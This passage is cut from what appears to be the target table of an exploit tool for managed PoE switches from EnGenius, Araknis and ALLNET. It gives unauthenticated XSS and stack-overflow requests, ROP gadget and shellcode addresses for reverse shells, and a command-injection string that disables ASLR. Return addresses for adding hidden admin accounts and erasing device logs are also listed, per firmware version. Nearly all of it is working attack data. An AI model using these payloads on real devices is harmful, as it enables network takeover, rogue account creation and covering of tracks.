False,\r\n\t\t\t\t\t\t\t'response':'502',\r\n\t\t\t\t\t\t\t'Content-Type':False,\r\n\t\t\t\t\t\t\t'uri':'/cgi-bin/sn.captivePortal.login?cmd=action',\r\n\t\t\t\t\t\t\t'content':'mac=dummy&res=dummy&userurl=dummy&uamip=dummy&alertmsg=dummy&called=' + self.random_string(4100),\r\n\t\t\t\t\t\t\t'check_uri':False,\r\n\t\t\t\t\t\t\t'content_check':False,\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t\t'sn.jrpc.dispatch.cgi': {\r\n\t\t\t\t\t\t\t'description':'Stack overflow in \"usr, pswrd and method\" (PoC: crash CGI)',\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'502',\r\n\t\t\t\t\t\t\t'Content-Type':False,\r\n\t\t\t\t\t\t\t'uri':'/cgi-bin/sn.jrpc.dispatch.cgi',\r\n\t\t\t\t\t\t\t'content':'{\"id\":1, \"jsonrpc\":\"2.0\",\"params\":{\"usr\":\"admin\",\"pswrd\":\"' + self.random_string(288) + '\"},\"method\":\"login\"}',\r\n\t\t\t\t\t\t\t'check_uri':False,\r\n\t\t\t\t\t\t\t'content_check':False,\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t\t'sn.captivePortal.auth': {\r\n\t\t\t\t\t\t\t'description':'Stack overflow in \"user, chap_chal, chap_pass\" (PoC: crash CGI)',\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'502',\r\n\t\t\t\t\t\t\t'Content-Type':False,\r\n\t\t\t\t\t\t\t'uri':'/cgi-bin/sn.captivePortal.auth?user=admin&chap_chal=challenge&chap_pass='+ self.random_string(140),\r\n\t\t\t\t\t\t\t'content':'',\r\n\t\t\t\t\t\t\t'check_uri':False,\r\n\t\t\t\t\t\t\t'content_check':False,\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t},\r\n\t\t\t\t'exploit': {\r\n\t\t\t\t\t'heack_hydra_shell': {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/bin/boa; embedparse() \r\n\t\t\t\t\t\t'gadget': 0x40E15C,\t\t\t\t# Gadget: 'addu $v0,$gp ; jr $v0' (address, binary dependent)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/bin/boa; read_body(); \r\n\t\t\t\t\t\t'system': 0x8f99851c,\t\t\t# la $t9, system # opcode, binary dependent\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/bin/boa; read_body(); \r\n\t\t\t\t\t\t'handler': 0x24840690,\t\t\t# addiu $a0, (.ascii \"handler -c boa &\" - 0x430000) # (opcode, binary dependent)\r\n\t\t\t\t\t\t'v0': 6,\t\t\t\t\t\t# Should leave as-is (but you can play between 5 - 8)\r\n\t\t\t\t\t\t'safe': True, # Boa/Hydra restart/watchdog, False = no restart, True = restart\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_add_account': {\r\n\t\t\t\t\t\t# pt: 0 = no password, 1 = cleartext, 2 = encrypted\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi/set.cgi; sn_user_mngSet()\r\n\t\t\t\t\t\t'address':0x42D1D4,\t\t\t\t# Jump one after 'sw $ra'\t\t\t# (address, binary dependent)\r\n\t\t\t\t\t\t'account':'&na=USERNAME&pt=2&pw=PASSWORD&pwn=PASSWORD&pv=0&op=1&',\t\t\t# Admin, priv 15\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_del_account': {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi/set.cgi; sn_user_mngSet()\r\n\t\t\t\t\t\t'address':0x42D1D4,\t\t\t\t# Jump one after 'sw $ra'\t\t\t# (address, binary dependent)\r\n\t\t\t\t\t\t'account':'&na=USERNAME&pt=2&pv=0&op=0',\t\t# \r\n\t\t\t\t\t\t'vulnerable': True,\t\t\t\t# \r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_diag': {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi-bin/datajson.cgi; sn_tracertSet()\r\n\t\t\t\t\t\t# traceroute\r\n\t\t\t\t\t\t'web_sys_ping_post': 0x42CB8C,\t# Jump one after 'sw $ra'\t\t\t# (address, binary dependent)\r\n\t\t\t\t\t\t'sys_ping_post_cmd':'&ip=127.0.0.1 ;echo 0 > /proc/sys/kernel/randomize_va_space; cat /proc/sys/kernel/randomize_va_space > /tmp/conf_tmp/check #&mh=30&uid=0',\r\n\t\t\t\t\t\t'sys_ping_post_check':'',\r\n\t\t\t\t\t\t'verify_uri':'/conf_tmp/check',\r\n\r\n\t\t\t\t\t\t'vulnerable': True,\t\t\t\t# \r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_log': {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi-bin/datajson.cgi; sn_log_globalSet()\r\n\t\t\t\t\t\t'log_settings_set':0x4494E8,\t# Jump one after 'sw $ra'\t\t\t# Disable Logging (address, binary dependent)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi-bin/datajson.cgi; sn_log_show_Set()\r\n\t\t\t\t\t\t'log_ramClear':0x44B0C0,\t\t# Jump one after 'sw $ra'\t\t\t# Clean RAM log (address, binary dependent)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi-bin/datajson.cgi; sn_log_show_Set()\r\n\t\t\t\t\t\t'log_fileClear':0x44B0C0,\t\t# Jump one after 'sw $ra'\t\t\t# Clean FILE log (address, binary dependent)\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_sntp': {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi-bin/datajson.cgi; sn_sys_timeSet()\r\n\t\t\t\t\t\t'sys_timeSntp_set':0x42E438,\t# Jump one after 'sw $ra'\t\t\t# Set SNTP Server (Inject RCE)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi/set.cgi; cgi_sys_timeSntpDel_set()\r\n\t\t\t\t\t\t'sys_timeSntpDel_set':0x42E438,\t# Jump one after 'sw $ra'\t\t\t# Delete (address, binary dependent) \r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi/set.cgi; cgi_sys_timeSettings_set()\r\n\t\t\t\t\t\t'sys_timeSettings_set':0x42E438,# Jump one after 'sw $ra'\t\t\t# Enable/Disable (address, binary dependent)\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t}, \r\n\t\t\t\t\t'heack_cgi_shell': {\r\n\t\t\t\t\t\t'cgi':'security.cgi',\t\t\t# /sqfs/home/web/cgi-bin/security.cgi; main()\r\n\t\t\t\t\t\t'query':'nop=nop&usr=admin&pswrd=_PWDNOP_RA_START&shellcode=_USRNOP_SHELLCODE',\r\n\t\t\t\t\t\t'START':0x100271A0,\t\t\t\t# start: Stack overflow RA, used for searching NOP sled by blind jump\r\n\t\t\t\t\t\t'STOP':0x104006A0,\t\t\t\t# end: You may want to play with this if you dont get it working\r\n\t\t\t\t\t\t'usr_nop': 987,\t\t\t\t\t# NOP sled (shellcode will be tailed)\r\n\t\t\t\t\t\t'pwd_nop': 69,\t\t\t\t\t# filler/garbage (not used for something constructive)\r\n\t\t\t\t\t\t'align': 0,\t\t\t\t\t\t# Align opcodes in memory\r\n\t\t\t\t\t\t'stack':False,\t\t\t\t\t# NOP and shellcode lays on: True = stack, False = Heap\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t},\r\n\t\t\t\t},\r\n\t\t\t},\r\n\t\t\t'14044-44104': {\r\n\t\t\t\t'template':'EnGenius',\t\t\t\t\t\t# Static for the vendor\r\n\t\t\t\t'version':'1.07.22_c1.9.21_181018-0228',\t\t\t\t\t# Version / binary dependent stuff\r\n\t\t\t\t'model':'EWS1200-28TFP',\t\t\t\t# Model\r\n\t\t\t\t'uri':'https://www.engeniustech.com/engenius-products/managed-poe-network-switch-ews1200-28tfp/',\r\n\t\t\t\t'verify': { \r\n\t\t\t\t\t\t'cpl_locallogin.cgi (XSS)': {\r\n\t\t\t\t\t\t\t'description':'XSS in \"redirecturl,userurl,loginurl,username,password\" (PoC: Count passed XSS)',\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'xss',\r\n\t\t\t\t\t\t\t'Content-Type':False,\r\n\t\t\t\t\t\t\t'uri':'/cgi-bin/cpl_locallogin.cgi?redirecturl=<script>alert(XSS);</script>&userurl=<script>alert(XSS);</script>&loginurl=<script>alert(XSS);</script>',\r\n\t\t\t\t\t\t\t'content':'username=<script>alert(XSS);</script>&password=<script>alert(XSS);</script>',\r\n\t\t\t\t\t\t\t'check_uri':False,\r\n\t\t\t\t\t\t\t'content_check':False,\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t\t'sn.captivePortal.login (XSS)': {\r\n\t\t\t\t\t\t\t'description':'XSS in \"userurl & uamip\" (PoC: Count passed XSS)',\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'xss',\r\n\t\t\t\t\t\t\t'Content-Type':False,\r\n\t\t\t\t\t\t\t'uri':'/cgi-bin/sn.captivePortal.login?cmd=action',\r\n\t\t\t\t\t\t\t'content':'mac=dummy&res=dummy&userurl=<script>alert(XSS);</script>&uamip=<script>alert(XSS);</script>&alertmsg=dummy&called=dummy',\r\n\t\t\t\t\t\t\t'check_uri':False,\r\n\t\t\t\t\t\t\t'content_check':False,\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t\t'cpl_logo_ul.cgi': {\r\n\t\t\t\t\t\t\t'description':'Unauthenticated upload of \"logo_icon\". (PoC: Upload invalid file)',\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'json',\r\n\t\t\t\t\t\t\t'Content-Type':False,\r\n\t\t\t\t\t\t\t'uri':'/cgi-bin/cpl_logo_ul.cgi',\r\n\t\t\t\t\t\t\t'content':'Content-Disposition: filename.png\\n------',\r\n\t\t\t\t\t\t\t'check_uri':False,\r\n\t\t\t\t\t\t\t'content_check':False,\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t\t'cpl_locallogin.cgi': {\r\n\t\t\t\t\t\t\t'description':'Stack overflow in \"username/password (PoC: crash CGI)',\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'502',\r\n\t\t\t\t\t\t\t'Content-Type':False,\r\n\t\t\t\t\t\t\t'uri':'/cgi-bin/cpl_locallogin.cgi?redirecturl=AAAA&userurl=BBBB&loginurl=BBBB',\r\n\t\t\t\t\t\t\t'content':'username=admin&password=' + self.random_string(196),\r\n\t\t\t\t\t\t\t'check_uri':False,\r\n\t\t\t\t\t\t\t'content_check':False,\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t\t'sn.captivePortal.login': {\r\n\t\t\t\t\t\t\t'description':'Stack overflow in \"called\", XSS in \"userurl & uamip\" (PoC: crash CGI)',\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'502',\r\n\t\t\t\t\t\t\t'Content-Type':False,\r\n\t\t\t\t\t\t\t'uri':'/cgi-bin/sn.captivePortal.login?cmd=action',\r\n\t\t\t\t\t\t\t'content':'mac=dummy&res=dummy&userurl=dummy&uamip=dummy&alertmsg=dummy&called=' + self.random_string(4100),\r\n\t\t\t\t\t\t\t'check_uri':False,\r\n\t\t\t\t\t\t\t'content_check':False,\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t\t'sn.jrpc.dispatch.cgi': {\r\n\t\t\t\t\t\t\t'description':'Stack overflow in \"usr, pswrd and method\" (PoC: crash CGI)',\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'502',\r\n\t\t\t\t\t\t\t'Content-Type':False,\r\n\t\t\t\t\t\t\t'uri':'/cgi-bin/sn.jrpc.dispatch.cgi',\r\n\t\t\t\t\t\t\t'content':'{\"id\":1, \"jsonrpc\":\"2.0\",\"params\":{\"usr\":\"admin\",\"pswrd\":\"' + self.random_string(288) + '\"},\"method\":\"login\"}',\r\n\t\t\t\t\t\t\t'check_uri':False,\r\n\t\t\t\t\t\t\t'content_check':False,\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t\t'sn.captivePortal.auth': {\r\n\t\t\t\t\t\t\t'description':'Stack overflow in \"user, chap_chal, chap_pass\" (PoC: crash CGI)',\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'502',\r\n\t\t\t\t\t\t\t'Content-Type':False,\r\n\t\t\t\t\t\t\t'uri':'/cgi-bin/sn.captivePortal.auth?user=admin&chap_chal=challenge&chap_pass='+ self.random_string(140),\r\n\t\t\t\t\t\t\t'content':'',\r\n\t\t\t\t\t\t\t'check_uri':False,\r\n\t\t\t\t\t\t\t'content_check':False,\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t},\r\n\t\t\t\t'exploit': {\r\n\t\t\t\t\t'heack_hydra_shell': {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/bin/boa; embedparse() \r\n\t\t\t\t\t\t'gadget': 0x40E15C,\t\t\t\t# Gadget: 'addu $v0,$gp ; jr $v0' (address, binary dependent)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/bin/boa; read_body(); \r\n\t\t\t\t\t\t'system': 0x8f99851c,\t\t\t# la $t9, system # opcode, binary dependent\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/bin/boa; read_body(); \r\n\t\t\t\t\t\t'handler': 0x24840690,\t\t\t# addiu $a0, (.ascii \"handler -c boa &\" - 0x430000) # (opcode, binary dependent)\r\n\t\t\t\t\t\t'v0': 6,\t\t\t\t\t\t# Should leave as-is (but you can play between 5 - 8)\r\n\t\t\t\t\t\t'safe': True, # Boa/Hydra restart/watchdog, False = no restart, True = restart\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_add_account': {\r\n\t\t\t\t\t\t# pt: 0 = no password, 1 = cleartext, 2 = encrypted\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi/set.cgi; sn_user_mngSet()\r\n\t\t\t\t\t\t'address':0x42C334,\t\t\t\t# Jump one after 'sw $ra'\t\t\t# (address, binary dependent)\r\n\t\t\t\t\t\t'account':'&na=USERNAME&pt=2&pw=PASSWORD&pwn=PASSWORD&pv=0&op=1&',\t\t\t# Admin, priv 15\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_del_account': {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi/set.cgi; sn_user_mngSet()\r\n\t\t\t\t\t\t'address':0x42C334,\t\t\t\t# Jump one after 'sw $ra'\t\t\t# (address, binary dependent)\r\n\t\t\t\t\t\t'account':'&na=USERNAME&pt=2&pv=0&op=0',\t\t# \r\n\t\t\t\t\t\t'vulnerable': True,\t\t\t\t# \r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_diag': {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi-bin/datajson.cgi; sn_tracertSet()\r\n\t\t\t\t\t\t# traceroute\r\n\t\t\t\t\t\t'web_sys_ping_post': 0x42BCEC,\t# Jump one after 'sw $ra'\t\t\t# (address, binary dependent)\r\n\t\t\t\t\t\t'sys_ping_post_cmd':'&ip=127.0.0.1 ;echo 0 > /proc/sys/kernel/randomize_va_space; cat /proc/sys/kernel/randomize_va_space > /tmp/conf_tmp/check #&mh=30&uid=0',\r\n\t\t\t\t\t\t'sys_ping_post_check':'',\r\n\t\t\t\t\t\t'verify_uri':'/conf_tmp/check',\r\n\r\n\t\t\t\t\t\t'vulnerable': True,\t\t\t\t# \r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_log': {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi-bin/datajson.cgi; sn_log_globalSet()\r\n\t\t\t\t\t\t'log_settings_set':0x448008,\t# Jump one after 'sw $ra'\t\t\t# Disable Logging (address, binary dependent)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi-bin/datajson.cgi; sn_log_show_Set()\r\n\t\t\t\t\t\t'log_ramClear':0x449BE0,\t\t# Jump one after 'sw $ra'\t\t\t# Clean RAM log (address, binary dependent)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi-bin/datajson.cgi; sn_log_show_Set()\r\n\t\t\t\t\t\t'log_fileClear':0x449BE0,\t\t# Jump one after 'sw $ra'\t\t\t# Clean FILE log (address, binary dependent)\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_sntp': {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi-bin/datajson.cgi; sn_sys_timeSet()\r\n\t\t\t\t\t\t'sys_timeSntp_set':0x42D598,\t# Jump one after 'sw $ra'\t\t\t# Set SNTP Server (Inject RCE)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi-bin/datajson.cgi; sn_sys_timeSet()\r\n\t\t\t\t\t\t'sys_timeSntpDel_set':0x42D598,\t# Jump one after 'sw $ra'\t\t\t# Delete (address, binary dependent) \r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi-bin/datajson.cgi; sn_sys_timeSet()\r\n\t\t\t\t\t\t'sys_timeSettings_set':0x42D598,# Jump one after 'sw $ra'\t\t\t# Enable/Disable (address, binary dependent)\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t}, \r\n\t\t\t\t\t'heack_cgi_shell': {\r\n\t\t\t\t\t\t'cgi':'security.cgi',\t\t\t# /sqfs/home/web/cgi-bin/security.cgi; main()\r\n\t\t\t\t\t\t'query':'nop=nop&usr=admin&pswrd=_PWDNOP_RA_START&shellcode=_USRNOP_SHELLCODE',\r\n\t\t\t\t\t\t'START':0x100271A0,\t\t\t\t# start: Stack overflow RA, used for searching NOP sled by blind jump\r\n\t\t\t\t\t\t'STOP':0x104006A0,\t\t\t\t# end: You may want to play with this if you dont get it working\r\n\t\t\t\t\t\t'usr_nop': 987,\t\t\t\t\t# NOP sled (shellcode will be tailed)\r\n\t\t\t\t\t\t'pwd_nop': 69,\t\t\t\t\t# filler/garbage (not used for something constructive)\r\n\t\t\t\t\t\t'align': 0,\t\t\t\t\t\t# Align opcodes in memory\r\n\t\t\t\t\t\t'stack':False,\t\t\t\t\t# NOP and shellcode lays on: True = stack, False = Heap\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t},\r\n\t\t\t\t},\r\n\t\t\t},\r\n\r\n\t\t\t#\r\n\t\t\t# Araknis Networks\r\n\t\t\t#\r\n\t\t\t# CGI Reverse Shell : Yes\r\n\t\t\t# Boa/Hydra reverse shell: Yes\r\n\t\t\t# Del /var/log/ram.log : Yes\r\n\t\t\t# Del /var/log/flash.log : Yes\r\n\t\t\t# Del /mntlog/flash.log : Yes\r\n\t\t\t# Add credentials : Yes\r\n\t\t\t# Del credentials : Yes\r\n\t\t\t#\r\n\t\t\t'8028-89928': {\r\n\t\t\t\t'template':'Araknis',\t\t\t\t\t# Static for the vendor\r\n\t\t\t\t'version':'1.2.00_171225-1618',\t\t\t# Version / binary dependent stuff\r\n\t\t\t\t'model':'AN-310-SW-16-POE',\t\t\t\t# Model\r\n\t\t\t\t'uri':'http://araknisnetworks.com/',\r\n\t\t\t\t'exploit': {\r\n\t\t\t\t\t'heack_hydra_shell': {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/bin/boa; embedparse() \r\n\t\t\t\t\t\t'gadget': 0x40E04C,\t\t\t\t# Gadget: 'addu $v0,$gp ; jr $v0' (address, binary dependent)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/bin/boa; read_body(); \r\n\t\t\t\t\t\t'system': 0x8f99851c,\t\t\t# la $t9, system # opcode, binary dependent\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/bin/boa; read_body(); \r\n\t\t\t\t\t\t'handler': 0x24840470,\t\t\t# addiu $a0, (.ascii \"handler -c boa &\" - 0x430000) # (opcode, binary dependent)\r\n\t\t\t\t\t\t'v0': 6,\t\t\t\t\t\t# Should leave as-is (but you can play between 5 - 8)\r\n\t\t\t\t\t\t'safe': False, \t\t\t\t\t# Boa/Hydra restart/watchdog, False = no restart, True = restart\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_diag': {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi-bin/datajson.cgi; sn_tracertSet()\r\n\t\t\t\t\t\t# traceroute\r\n\t\t\t\t\t\t'web_sys_ping_post': 0x42A494,\t# Jump one after 'sw $ra'\t\t\t# (address, binary dependent)\r\n\t\t\t\t\t\t'sys_ping_post_cmd':'&ip=127.0.0.1 ;echo 0 > /proc/sys/kernel/randomize_va_space; cat /proc/sys/kernel/randomize_va_space > /tmp/conf_tmp/check #&mh=30&session_uid=0&uid=0',\r\n\t\t\t\t\t\t'sys_ping_post_check':'',\r\n\t\t\t\t\t\t'verify_uri':'/conf_tmp/check',\r\n\r\n\t\t\t\t\t\t'vulnerable': True,\t\t\t\t# \r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_add_account': {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi/set.cgi; sn_EncrypOnly_user_mngSet()\r\n\t\t\t\t\t\t'address':0x4303B4,\t\t\t\t# Jump one after 'sw $ra'\t\t\t# (address, binary dependent)\r\n\t\t\t\t\t\t'account':'&na=USERNAME&pw=PASSWORD&pv=0&op=1&',\t\t\t# Admin, priv 15\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_del_account': {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi/set.cgi; sn_user_mngSet()\r\n\t\t\t\t\t\t'address':0x42ADB8,\t\t\t\t# Jump one after 'sw $ra'\t\t\t# (address, binary dependent)\r\n\t\t\t\t\t\t'account':'&na=USERNAME&pw=&pv=0&op=0',\t\t# \r\n\t\t\t\t\t\t'vulnerable': True,\t\t\t\t# user\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_log': {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi-bin/datajson.cgi; sn_log_globalSet()\r\n\t\t\t\t\t\t'log_settings_set':0x44DBD8,\t# Jump one after 'sw $ra'\t\t\t# Disable Logging (address, binary dependent)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi-bin/datajson.cgi; sn_log_show_Set()\r\n\t\t\t\t\t\t'log_ramClear':0x44FC88,\t\t# Jump one after 'sw $ra'\t\t\t# Clean RAM log (address, binary dependent)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi-bin/datajson.cgi; sn_log_show_Set()\r\n\t\t\t\t\t\t'log_fileClear':0x44FC88,\t\t# Jump one after 'sw $ra'\t\t\t# Clean FILE log (address, binary dependent)\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_sntp': {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi-bin/datajson.cgi; sn_sys_timeSet()\r\n\t\t\t\t\t\t'sys_timeSntp_set':0x42BAE4,\t# Jump one after 'sw $ra'\t\t\t# Set SNTP Server (Inject RCE)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi-bin/datajson.cgi; sn_sys_timeSet()\r\n\t\t\t\t\t\t'sys_timeSntpDel_set':0x42BAE4,\t# Jump one after 'sw $ra'\t\t\t# Delete (address, binary dependent) \r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi-bin/datajson.cgi; sn_sys_timeSet()\r\n\t\t\t\t\t\t'sys_timeSettings_set':0x42BAE4,# Jump one after 'sw $ra'\t\t\t# Enable/Disable (address, binary dependent)\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t}, \r\n\t\t\t\t\t'heack_cgi_shell': {\r\n\t\t\t\t\t\t'cgi':'security.cgi',\t\t\t# /sqfs/home/web/cgi-bin/security.cgi; main()\r\n\t\t\t\t\t\t# We need these to push NOP and shellcode on higher heap addresses to avoid 0x00\r\n\t\t\t\t\t\t'query': (self.random_string(1) +'=' + self.random_string(1) +'&') * 110 + 'usr=admin&pswrd=_PWDNOP_RA_START&shellcode=_USRNOP_SHELLCODE',\r\n\t\t\t\t\t\t#'query':'a=a&' * 110 + 'usr=admin&pswrd=_PWDNOP_RA_START&shellcode=_USRNOP_SHELLCODE',\r\n\t\t\t\t\t\t'START':0x10010104,\t\t\t\t# start: Stack overflow RA, used for searching NOP sled by blind jump\r\n\t\t\t\t\t\t'STOP': 0x10600604,\t\t\t\t# end: You may want to play with this if you dont get it working\r\n\t\t\t\t\t\t'usr_nop': 987,\t\t\t\t\t# NOP sled (shellcode will be tailed)\r\n\t\t\t\t\t\t'pwd_nop': 69,\t\t\t\t\t# filler/garbage (not used for something constructive)\r\n\t\t\t\t\t\t'align': 0,\t\t\t\t\t\t# Align opcodes in memory\r\n\t\t\t\t\t\t'stack':False,\t\t\t\t\t# NOP and shellcode lays on: True = stack, False = Heap\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t},\r\n\t\t\t\t},\r\n\t\t\t},\r\n\r\n\t\t\t#\r\n\t\t\t# ALLNET GmbH Computersysteme \r\n\t\t\t# JSON based SG8xxx\r\n\t\t\t#\r\n\t\t\t# CGI Reverse Shell : Yes\r\n\t\t\t# Boa/Hydra reverse shell: Yes\r\n\t\t\t# Del /var/log/ram.log : Yes\r\n\t\t\t# Del /var/log/flash.log : Yes\r\n\t\t\t# Del /mntlog/flash.log : Yes\r\n\t\t\t# Add credentials : Yes\r\n\t\t\t# Del credentials : Yes\r\n\t\t\t#\r\n\t\t\t'752-76347': {\r\n\t\t\t\t'model':'ALL-SG8208M',\r\n\t\t\t\t'template':'ALLNET_JSON',\t\t\t\t\t# Static for the vendor\r\n\t\t\t\t'version':'2.2.1',\t\t\t\t\t\t# Version / binary dependent stuff\r\n\t\t\t\t'exploit': {\r\n\t\t\t\t\t'heack_hydra_shell': {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/bin/boa; embedparse() \r\n\t\t\t\t\t\t'gadget': 0x40C4FC,\t\t\t\t# Gadget: 'addu $v0,$gp ; jr $v0' (address, binary dependent)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/bin/boa; read_body(); \r\n\t\t\t\t\t\t'system': 0x8f998528,\t\t\t# la $t9, system # opcode, binary dependent\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/bin/boa; read_body(); \r\n\t\t\t\t\t\t'handler': 0x248498dc,\t\t\t# addiu $a0, (.ascii \"handler -c boa &\" - 0x430000) # (opcode, binary dependent)\r\n\t\t\t\t\t\t'v0': 7,\t\t\t\t\t\t# Should leave as-is (but you can play between 5 - 8)\r\n\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_diag': {\r\n\t\t\t\t\t\t'vulnerable': False,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_add_account': {\r\n\t\t\t\t\t\t'vulnerable': False,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_del_account': {\r\n\t\t\t\t\t\t'vulnerable': False,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_log': {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi/set.cgi; 